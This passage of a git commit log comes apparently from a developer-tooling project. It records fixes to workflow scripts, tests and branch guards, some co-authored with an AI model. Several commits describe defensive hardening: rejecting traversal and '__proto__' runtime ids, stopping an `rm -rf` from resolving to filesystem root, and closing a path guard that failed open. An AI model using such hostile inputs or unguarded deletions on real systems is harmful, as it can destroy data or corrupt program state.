  Windows/Git-Bash default — which here would route a passing verification into
  the recovery arm, strictly worse than the grep being replaced.

- $VERIFICATION_STATUS is a DISPLAY string ("Verified" / "Needs Review" /
  "Gaps") consumed at quick.md:619 and quick.md:684, not the raw status. The
  raw value lands in $STATUS and the new arm sets both, so the failure path
  does not emit an empty index-table cell.

next_action / next_command are deliberately not surfaced. readVerificationStatus
discovers and parses shape-agnostically, which is what makes the status half
correct for ${QUICK_DIR}; but it also reads the directory basename as a phase
token to build those commands, and a quick dir is `${quick_id}-${slug}` with a
date-derived quick_id — so the projection carries the date as a phase argument.
Quick supplies its own recovery actions instead.

Adds tests/fix-3174-quick-verification-status-read.test.cjs under
`allow-test-rule: source-text-is-the-product` (CONTRIBUTING.md's exception
matrix; the pattern tests/verify-work-auto-transition.test.cjs already uses for
verify-work's status-query ordering). It pins five properties: the query
replaces the grep, the bootstrap precedes the call, the bootstrap matches the
canonical launcher snippet, the status-read fence is jq-free, and the terminal
arm names all three sentinels and sets the display string. Verified as a
negative control against pre-fix next: 0/5 pass there, 5/5 here.
2026-08-08 06:01:46 -05:00
Tom Boucher
3f349e551d fix(#3024): route sync-skills through the shipped gsd-tools instead of an unshipped install.js (#3195)
* fix(#3024): sync-skills workflow uses gsd-tools query skills-root instead of unshipped install.js

The sync-skills workflow Step 2 shelled out to gsd-core/bin/install.js --skills-root,
but install.js is not shipped in installed trees (only in the npm tarball root bin/).
Every /gsd-update --sync invocation failed with MODULE_NOT_FOUND.

Fix: added 'gsd-tools query skills-root <runtime>' subcommand (gsd-tools IS shipped)
that calls the same getGlobalSkillsBase function install.js used. Updated the
workflow to call gsd_run query skills-root instead of the dead install.js path.

Also documented the #3025 verbatim-cp limitation in Step 5 with a workaround.

* test(#3024): failing-first guards for the three defects in the adopted fix

The cherry-picked commit came from an aborted run that never executed its own
tests. Its raw-path assertion fails as written, which is the clearest evidence
the work never reached verification.

Covers:
- --raw must emit a bare path, not JSON (output() takes a third rawValue arg
  that routeSkillsRoot omits, so the raw branch never fires)
- an unknown, empty, whitespace, traversing, or metacharacter-bearing runtime
  must be rejected, not silently resolved to claude's skills root
- sync-skills.md must contain zero references to the unshipped install.js,
  including the guard's remediation text — the issue's second reported defect
- parity across every runtime in the registry, not three hardcoded ones, so the
  two entry points cannot drift

Also converts the adopted tests off a hand-rolled spawnSync onto the bounded
process seam, per CONTRIBUTING.

Fails before the fix. Verified via the remote runner.

* fix(#3024): make the skills-root query actually work and reach non-Claude runtimes

The cherry-picked commit never ran its own tests. Six defects, all fixed here.

--raw was ignored: output() is output(result, raw, rawValue) and the third
argument was omitted, so the raw branch never fired and the workflow captured a
JSON blob as SRC_SKILLS_ROOT. Every downstream cp -r then resolved against a
nonexistent path — the command would have shipped still broken.

An unknown runtime silently resolved to claude's skills root, because
getGlobalSkillsBase falls back rather than returning null, leaving the existing
=== null guard dead. The runtime id is now validated at the CLI boundary against
the shipped registry, so a typo'd --from/--to fails instead of reading from or
writing into the wrong runtime's tree.

getGlobalSkillsBase('vscode') threw a raw TypeError. vscode is non-installable
by descriptor, so it has no skills root — null is the answer, not a crash. The
resolver now short-circuits configHome.kind 'none', which also fixes the same
latent crash in install.js --skills-root vscode. Every caller already gates on
=== null.

sync-skills.md used gsd_run WITHOUT the canonical launcher preamble, so gsd_run
was undefined on non-Claude runtimes — the fix would have been dead in exactly
the place the original bug bit. Preamble propagated via sync-runtime-launcher.

Also registers skills-root in TOP_LEVEL_USAGE (the help/dispatch parity guard
caught it), removes the last two install.js references including the guard's
remediation text (the issue's second reported defect), and updates the stale
assertion that still described the removed contract.

Verified on the remote runner.

* fix(#3024): align the documented runtime list with the registry and gate both entry points

Isolated review returned BLOCK on two findings.

The workflow's Supported-runtimes list and its --to all expansion named grok and
gemini, neither of which is a registered runtime. Once this branch added
validation, --to all — a documented first-class feature — aborted. The list was
hand-copied prose shadowing the registry, so correcting it alone would drift
again; a parity assertion now fails in BOTH directions if the doc and the
registry disagree. vscode is excluded by name: it is installSurface 'none', so
syncing skills to it is meaningless and would abort.

bin/install.js --skills-root reached getGlobalSkillsBase with no own-property
gate, so --skills-root __proto__ silently resolved to claude's skills root. This
branch had just hardened the OTHER entry point to the same function; leaving one
of two parallel surfaces open is the same divergence class as the first finding.
Both now call one shared isRegisteredRuntimeId() rather than a copied check, and
the parity test covers the hostile ids so the two can never disagree again.

Also guards the workflow's root resolution: neither command substitution checked
its exit status and only the source had an existence guard, so a failed
destination resolution left DEST_ROOT empty and turned rm -rf "$DEST_ROOT/$SKILL"
into an absolute path at filesystem root. Both resolutions are now checked, and
Step 5 requires both roots to be non-empty and absolute before any destructive
command.

Verified on the remote runner.

* test(#3024): anchor the runtime-list parity extractor to the list span

The extractor captured (.+) to end of line, so it swallowed the em-dash prose
that explains the vscode exclusion — and that sentence contains backticked
`runtimes` and `null`, which is where the three phantom ids came from. The
documented list was correct; the test was reading its own explanation back as
data. Anchored to the id-list span.

Both directions still fail as intended: proven by injecting a bogus id and by
removing a registered one.

* test(#3024): anchor the --to all extractor and fail loudly on empty captures

The workflow has three TO_RUNTIMES= assignments and the regex matched the first
one — an empty array initializer at line 28 — so the extractor captured nothing
and the assertion diffed [] against 18 ids as if that were data.

That is the same failure twice, so the fix is the general one: every extractor
in this test now asserts it captured a plausible list before comparing, naming
which extractor found nothing and what it was looking for. An extractor that
silently yields [] is a confident wrong answer, and a parity guard that reports
it as a data mismatch teaches the reader to loosen the assertion.

Verified against the real workflow and against doctored copies with each target
construct removed, plus both teeth directions.

* fix(#3024): merge duplicate process-seam import after rebase

The rebase applied cleanly but left runNode declared twice: next had gained its
own import of the seam while this branch added one carrying OUTCOME. A clean
rebase is not a correct one — the file no longer parsed. Merged into a single
import providing both.

* fix(#3024): bind DEST_ROOT per destination instead of a dangling map

Step 2 stored each destination's root into DEST_SKILLS_ROOTS, which nothing ever
read, while Steps 3 and 5 used a scalar DEST_ROOT that nothing ever assigned. The
array was also never declare -A'd, so on bash 3.2 — macOS system bash, which this
repo supports — every destination collapsed onto index 0.

The absolute-path guard added earlier was the only thing standing between that and
rm -rf "/$SKILL"; it turned a silent disaster into a hard stop, but the feature
still could not complete. Each destination now binds its own DEST_ROOT where it is
used, and the unread map is gone rather than replaced.

Step 2 keeps eager validation, so a bad runtime id in a multi-destination --to
aborts before any destination is written rather than after some already have been.

Verified on bash 3.2 with a two-destination run binding distinct roots, and with a
bad id aborting before any destructive call.

* fix(#3024): restore grok support broken by the registry gate

The registry gate added earlier rejected grok, and that was my error. I confirmed
grok was absent from the capability registry and concluded the hardcoded branch
was dead — without checking what it resolved to. It resolves to ~/.agents/skills,
a real grok-specific path, exactly as the pre-fix workflow documented ('grok uses
the ~/.agents layout'), and there is a support discussion doc for it. So a
working, documented runtime silently lost --skills-root and sync-skills support
as a side effect of prototype-pollution hardening — and the parity test I added
locked that in as correct.

gemini is the one that really was dead: it fell through to CLAUDE's skills root,
so rejecting it is right and it stays rejected, as do bogus ids, __proto__,
empty, whitespace and traversal.

The validator's real question is 'does this id have a genuine runtime-specific
resolution', not 'is it in the registry map'. Registry membership was a proxy
that happened to miss grok. Legacy non-registry runtimes with dedicated
resolution branches are now a named, documented set; enumerating every hardcoded
branch in getGlobalConfigDir against the registry confirms grok is the only one.

The new tests assert grok resolves UNDER .agents and specifically not to claude's
root. Allow-listing an id proves nothing about whether it resolves correctly —
that assertion is what would have caught my mistake.

Also uses the shared PROBE_TIMEOUT_MS instead of a duplicate literal, and guards
Step 3's DEST_ROOT re-resolution, which contradicted the file's own stated
guarantee.

Verified on the remote runner.

* test(#3024): guard against LEGACY_NON_REGISTRY_RUNTIME_IDS drifting

The named legacy set is a second hand-maintained proxy for the same predicate
the registry check got wrong — 'does this id resolve runtime-specifically'.
Nothing stopped a third hardcoded branch being added to getGlobalConfigDir
without updating the Set, reproducing the exact class of bug that broke grok.

Production stays explicit and greppable; the test derives the truth instead. It
resolves a sentinel id to learn the generic fallback, classifies every candidate
against it, and fails in both directions — an id resolving runtime-specifically
that is in neither the registry nor the Set, or a Set entry that no longer earns
its exemption. The failure message names the remedy.

Confirms grok resolves runtime-specifically and gemini does not, which is the
distinction the original registry check could not see.

Also reverts the shared-timeout swap: SKILLS_ROOT_PROBE_TIMEOUT_MS is
pre-existing on next and arrived by rebase, so changing it here was scope creep
into another issue's territory.

Verified on the remote runner.

* chore(#3024): backfill changeset PR number

---------

Co-authored-by: sim <sim@local>
2026-08-07 18:53:25 -04:00
sim
8a0c1bce2e test(#3149): correct stale tdd_mode assertion and drop a marker-token collision
Two failures from the remote runner on 654b2cc10, both introduced here.

1. tests/mcp-catalog-parity.install.test.cjs greps emitted workflow files
   for the bare substring 'gsd:section' and treats its presence in a
   composed file as an un-stripped marker. debug.md's new Step 0 prose
   documented the field by writing that token literally, so the emitted
   file tripped the gate even though the parser correctly ignored it as
   prose. Reworded to 'applicability-section markers'. Same class as
   DEFECT.PROMPT-INJECTION-SCAN-COLLISION.

2. tests/debug-session-management.test.cjs asserted debug.md contains the
   literal 'config-get workflow.tdd_mode'. That call is gone. The
   invariant it protected -- tdd_mode comes from the workflow.tdd_mode
   key, never a bare top-level one -- is unchanged, and now has a
   stronger behavioral home: init-debug.test.cjs row A9 asserts a bare
   key is ignored and the canonical key is honored, whatever the read
   mechanism.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
2026-08-07 10:09:18 -04:00
sim
2bead6ca1d feat(#3149): add dedicated init.debug entry point for /gsd:debug
/gsd:debug was one of the last workflows with no cmdInit* of its own: its
Step 0 made three separate round-trips (state.load, resolve-model
gsd-debugger, config-get workflow.tdd_mode) to assemble one context. Because
no debug-scoped fact was computed at any entry point, ADR-1671 admission gate
(2) could never be satisfied for debug — an applicability atom naming such a
fact would evaluate FALSE forever and silently exclude its section.

Adds cmdInitDebug (init.debug), registers it in the init router and the
command-alias table, and collapses debug.md Step 0 to one call. Every field
resolves through the same primitive the call it replaces used: loadConfig for
commit_docs, withProjectRoot for response_language (#2402), planningPaths for
debug_dir, resolveModelInternal for debugger_model, and the existing
Boolean(workflow.tdd_mode) idiom for tdd_mode.

PlanningPaths gains a debug field so state.load and init.debug share ONE
debug-directory expression rather than two kept in sync by hand. state.load
keeps emitting debug_dir: it is a shipped query surface with its own test
anchor, so narrowing it would break unseen consumers for no gain.

No WHEN_VOCABULARY atom and no gsd:section marker: gate (1), a consuming
section of at least 400 bytes, belongs to the change that adds the section.

Closes #3149

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
2026-08-07 09:30:27 -04:00
Tom Boucher
3146ff36aa fix(#3132): realign retired covered/backstop-as-status vocab to resolved+verification (#3138)
* fix(#3132): realign spec/plan/ui-phase workflow prose from retired covered/backstop-as-status to resolved+verification

The edge-probe resolution model splits status (resolved|dismissed|unresolved)
from verification (explicit|backstop). The workflow prose in three files still
used the pre-re-cut covered/backstop-as-status vocabulary that validateResolution
rejects.

Swept all three prose surfaces:
- spec-phase.md: Step 5.5 resolution options, --auto mode + log line, comment, Step 6 row list
- plan-phase.md: lift rule (L778/L780), comments (L564/L706), quality gate (L826-827)
- ui-phase.md: resolution loop (L391), --auto mode (L405-409), write-back format (L415)

Added regression test in edge-probe-spec-phase-contract.test.cjs asserting the
retired vocab is absent and resolved+verification is used instead.

* chore(#3132): add changeset + emitted-drift ack for workflow vocab realignment

* fix(#3132): update planner contract tests for resolved+verification vocabulary

RR-02 and RR-03 tests asserted the old covered/backstop-as-status vocab.
Updated to match the realigned prose (resolved edge → must_haves).

* fix(#3132): fix specless-probe-fallback test assertion + merge duplicate ack

Test assertion was too strict (expected auto-resolved + verification:explicit
on same line). Split into two independent assertions.

Merged plan-phase.md ack into existing #2658 fragment to resolve duplicate-path
rule violation.

* fix(#3132): use bare filenames in ack keys (size map keys are bare, not full paths)

* fix(#3132): amend existing acks instead of duplicating — remove plan-phase from #2658, spec-phase from #3132, append #3132 reason to #0000 and #2650

* chore(#3132): backfill changeset PR number 3138

---------

Co-authored-by: sim <sim@local>
2026-08-07 04:45:30 -04:00
Tom Boucher
e7ce60fd21 fix(#3035): add kimi-code detection and flag to review workflow (#3115)
* fix(#3035): add kimi-code detection and flag to review workflow

The kimi-code reviewer lane was declared in REVIEWER_LANES, documented in
docs/COMMANDS.md, resolved via --kimi-code, and functional when reached —
but review.md's detect_clis hardcoded 11 of 12 lanes (no kimi probe) and
the flag-parse list omitted --kimi-code. /gsd:review --kimi-code could
never reach SELECTED_REVIEWERS.

Added command -v kimi detection and the --kimi-code flag to the review
workflow's CLI detection and flag-parse steps.

* chore(#3035): backfill changeset PR number 3115

---------

Co-authored-by: sim <sim@local>
2026-08-06 07:27:54 -04:00
Tom Boucher
10da377794 fix(#3021): recognize worktree-wf_* branch namespace in all guards (#3109)
* fix(#3021): recognize worktree-wf_* branch namespace in all guards

The Claude-orchestration Workflow backend (#1143) creates per-plan
worktrees on branches named worktree-wf_<runid>-<n>. Four independent
copies of the agent branch allow-list regex (^(worktree-)?agent-...) never
learned this namespace:
- hooks/gsd-worktree-path-guard.js:176 — FAILED OPEN (process.exit(0)),
  silently disabling path containment for exactly the concurrent dispatch
  mode where cross-worktree writes are most likely
- src/worktree-safety.cts:21 — silently dropped cleanup-wave manifest
  entries
- agents/gsd-executor.md:503 — FATAL halt on branch check
- gsd-core/references/worktree-branch-check.md:33 — same FATAL halt

Extended all four to ^((worktree-)?agent-|worktree-wf_)[A-Za-z0-9._/-]+$.
The path guard now correctly blocks cross-worktree writes for Workflow-
backend branches instead of no-op'ing.

* chore(#3021): backfill changeset PR number 3109

---------

Co-authored-by: sim <sim@local>
2026-08-06 04:26:59 -04:00